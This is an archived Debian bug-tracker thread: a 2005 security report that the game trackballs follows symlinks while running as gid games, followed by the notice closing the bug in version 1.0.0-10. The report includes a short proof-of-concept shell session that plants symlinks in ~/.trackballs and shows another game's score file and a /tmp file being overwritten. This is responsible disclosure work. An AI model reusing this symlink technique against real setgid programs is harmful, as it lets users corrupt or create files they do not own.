Your message dated Sun, 08 May 2005 19:32:19 -0400
with message-id <[EMAIL PROTECTED]>
and subject line Bug#302454: fixed in trackballs 1.0.0-10
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 31 Mar 2005 21:54:43 +0000
>From [EMAIL PROTECTED] Thu Mar 31 13:54:43 2005
Return-path: <[EMAIL PROTECTED]>
Received: from av7-1-sn4.m-sp.skanova.net [81.228.10.110]
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DH7ch-0003Br-00; Thu, 31 Mar 2005 13:54:43 -0800
Received: by av7-1-sn4.m-sp.skanova.net (Postfix, from userid 502)
id 397FA37E42; Thu, 31 Mar 2005 23:54:12 +0200 (CEST)
Received: from smtp2-1-sn4.m-sp.skanova.net (smtp2-1-sn4.m-sp.skanova.net
[81.228.10.183])
by av7-1-sn4.m-sp.skanova.net (Postfix) with ESMTP
id 25A0737E42; Thu, 31 Mar 2005 23:54:12 +0200 (CEST)
Received: from h55n2fls31o1123.telia.com (h55n2fls31o1123.telia.com
[81.224.172.55])
by smtp2-1-sn4.m-sp.skanova.net (Postfix) with ESMTP id D90C337E49;
Thu, 31 Mar 2005 23:54:11 +0200 (CEST)
Received: from metaur by h55n2fls31o1123.telia.com with local (Exim 4.50)
id 1DH7cB-0000DZ-PP; Thu, 31 Mar 2005 23:54:11 +0200
Date: Thu, 31 Mar 2005 23:54:11 +0200
From: Ulf Harnhammar <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: trackballs: Follows symlinks as gid games
Message-ID: <[EMAIL PROTECTED]>
Reply-To: [EMAIL PROTECTED]
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
X-Blog-URL: http://www.advogato.org/person/metaur/
User-Agent: Mutt/1.5.6+20040907i
Content-Transfer-Encoding: quoted-printable
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-8.0 required=4.0 tests=BAYES_00,HAS_PACKAGE
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
Subject: trackballs: Follows symlinks as gid games
Package: trackballs
Version: 1.0.0-9
Severity: important
Tags: security
Hello,
I have found that trackballs follows symlinks when running as gid games. =
It writes
to files such as $HOME/.trackballs/[USERNAME].gmr and $HOME/.trackballs/s=
ettings
without checking if they are symlinks somewhere else. This can be abused =
for
overwriting or creating files wherever the games group is allowed to do s=
o.
One way to solve the problem is to make sure that these files are not sym=
links.
Here is a session capture showing this problem:
$ dpkg -l trackballs
Desired=3DUnknown/Install/Remove/Purge/Hold
| Status=3DNot/Installed/Config-files/Unpacked/Failed-config/Half-install=
ed
|/ Err?=3D(none)/Hold/Reinst-required/X=3Dboth-problems (Status,Err: uppe=
rcase=3Dbad)
||/ Name Version D=
escription
+++-=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D-=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D-=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D
ii trackballs 1.0.0-9 A=
n OpenGL-based game of marbles through a labyrinth
$ rm -rf ~/.trackballs
$ mkdir ~/.trackballs
$ ln -s /var/games/gnometris.scores ~/.trackballs/metaur.gmr
$ ln -s /tmp/testing ~/.trackballs/settings
$ ls -al /tmp/testing
ls: /tmp/testing: No such file or directory
$ cat /var/games/gnometris.scores
31.000000 1105059399 Ulf Harnhammar
$ ls -al ~/.trackballs/
total 12
drwxr-xr-x 2 metaur metaur 4096 2005-03-31 23:22 .
drwxr-xr-x 68 metaur metaur 8192 2005-03-31 23:22 ..
lrwxrwxrwx 1 metaur metaur 27 2005-03-31 23:22 metaur.gmr -> /var/gam=
es/gnometris.scores
lrwxrwxrwx 1 metaur metaur 12 2005-03-31 23:22 settings -> /tmp/testi=
ng
$ trackballs -w
Welcome to Trackballs.=20
Using /usr/share/games/trackballs as gamedata dir
Warning: Rescaling images before loading them as textures.
Attempting to open mixer...open /dev/sequencer: No such file or directory
successfull
Warning. Ignoring outdated player profile for player metaur
Warning. Ignoring outdated player profile for player metaur
Trackballs initialization successfull
Killed
$ cat /var/games/gnometris.scores
^_M-^K^H^CM-eM-^U1^NM-B0^LE^C^KM-WM-p^Uz^CJ^E^ClM-$^R#
4M-$M-^A4M-)M-^R^T^DM-''U+1M-1M-DM-#-yM-5M-,M-wM-dM-o%M-{_M-+M-T%^Xg^UM-<=
M-D^[ZM-WIFM--^VM-)[EMAIL PROTECTED]@M-dM=
[EMAIL
PROTECTED]){M-DM-^LM-+M-3(^I<za^UEM-z?^GEM-^H0sM-p93^ZM-^\^BM-65:M-R509M-(DM-^H=
^F^AAM-^N^L^Q^ZM-F,M-ZM-9M-A^CM-^W"8^[HM-~^CmcM-^^ELuKM-|f|M-g^\^UM-{M-!M=
-k^YM-q;M-XxM-]`M-bM-xM-^^^XbM-RM-hM- [EMAIL PROTECTED]
-~M-A^WgM-ejM-GM-<
$ ls -al /tmp/testing
-rw-r--r-- 1 metaur games 80 2005-03-31 23:23 /tmp/testing
$ cat /tmp/testing
[EMAIL PROTECTED]@M-^?M-^?M-^?^?$
$
// Ulf H=E4rnhammar for the Debian Security Audit Project
http://www.debian.org/security/audit/
-- System Information:
Debian Release: 3.1
APT prefers unstable
APT policy: (500, 'unstable'), (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.8-2-686
Locale: LANG=3Den_US, LC_CTYPE=3Den_US (charmap=3DISO-8859-1)
Versions of packages trackballs depends on:
ii guile-1.6-lib 1.6.7-1 Main Guile libraries
ii libc6 2.3.2.ds1-20 GNU C Library: Shared librar=
ies an
ii libgcc1 1:3.4.3-6 GCC support library
ii libguile-ltdl 1.6.7-1 Guile's patched version of l=
ibtool
ii libqthreads-1 1.6.7-1 QuickThreads library for Gui=
le
ii libsdl-image1 1.2.4-1 image loading library for Si=
mple D
ii libsdl-mixer1 1.2.6-1 mixer library for Simple Dir=
ectMed
ii libsdl-ttf2.0 2.0.6-5 ttf library for Simple Direc=
tMedia
ii libsdl1.2debi 1.2.7+1.2.8cvs20041007-4.1 Simple DirectMedia Layer
ii libstdc++5 1:3.3.5-8 The GNU Standard C++ Library=
v3
ii trackballs-da 1.0.0-7 Data files for trackballs
ii xlibmesa-gl [ 4.3.0.dfsg.1-10 Mesa 3D graphics library [XF=
ree86]
ii xlibmesa-glu 4.3.0.dfsg.1-10 Mesa OpenGL utility library =
[XFree
ii zlib1g 1:1.2.2-3 compression library - runtim=
e
-- no debconf information
---------------------------------------
Received: (at 302454-close) by bugs.debian.org; 8 May 2005 23:42:29 +0000
>From [EMAIL PROTECTED] Sun May 08 16:42:29 2005
Return-path: <[EMAIL PROTECTED]>
Received: from newraff.debian.org [208.185.25.31] (mail)
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DUvPp-0004at-00; Sun, 08 May 2005 16:42:29 -0700
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
id 1DUvFz-0005qj-00; Sun, 08 May 2005 19:32:19 -0400
From: Ari Pollak <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.55 $
Subject: Bug#302454: fixed in trackballs 1.0.0-10
Message-Id: <[EMAIL PROTECTED]>
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Sun, 08 May 2005 19:32:19 -0400
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
Source: trackballs
Source-Version: 1.0.0-10
We believe that the bug you reported is fixed in the latest version of
trackballs, which is due to be installed in the Debian FTP archive:
trackballs-data_1.0.0-10_all.deb
to pool/main/t/trackballs/trackballs-data_1.0.0-10_all.deb
trackballs_1.0.0-10.diff.gz
to pool/main/t/trackballs/trackballs_1.0.0-10.diff.gz
trackballs_1.0.0-10.dsc
to pool/main/t/trackballs/trackballs_1.0.0-10.dsc
trackballs_1.0.0-10_i386.deb
to pool/main/t/trackballs/trackballs_1.0.0-10_i386.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Ari Pollak <[EMAIL PROTECTED]> (supplier of updated trackballs package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160
Format: 1.7
Date: Sun, 8 May 2005 18:49:27 -0400
Source: trackballs
Binary: trackballs trackballs-data
Architecture: source i386 all
Version: 1.0.0-10
Distribution: unstable
Urgency: low
Maintainer: Ari Pollak <[EMAIL PROTECTED]>
Changed-By: Ari Pollak <[EMAIL PROTECTED]>
Description:
trackballs - An OpenGL-based game of marbles through a labyrinth
trackballs-data - Data files for trackballs
Closes: 302454
Changes:
trackballs (1.0.0-10) unstable; urgency=low
.
* Backport symlink checking code from upstream CVS (Closes: #302454)
* Don't bother running the script to install a GNOME .desktop file
since it doesn't work anyway
Files:
3926533d9d13915fc596b4af9d01adee 733 games extra trackballs_1.0.0-10.dsc
d5f96e993a63cb62b10f8ebd7d1329cd 65227 games extra trackballs_1.0.0-10.diff.gz
85f3e07df41917c9d8e619326de9f250 158428 games extra
trackballs_1.0.0-10_i386.deb
df8f6e943d426bdbc23cccb7e1faf7b5 4545242 games extra
trackballs-data_1.0.0-10_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (GNU/Linux)
iD8DBQFCfp1FwO+u47cOQDsRA8wQAJsEAEiB2d1UNb7JzBxvlzwbKgGRswCbBtGd
2OB7HrW7n+R9I8gPj5fRzKA=
=lJc6
-----END PGP SIGNATURE-----
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
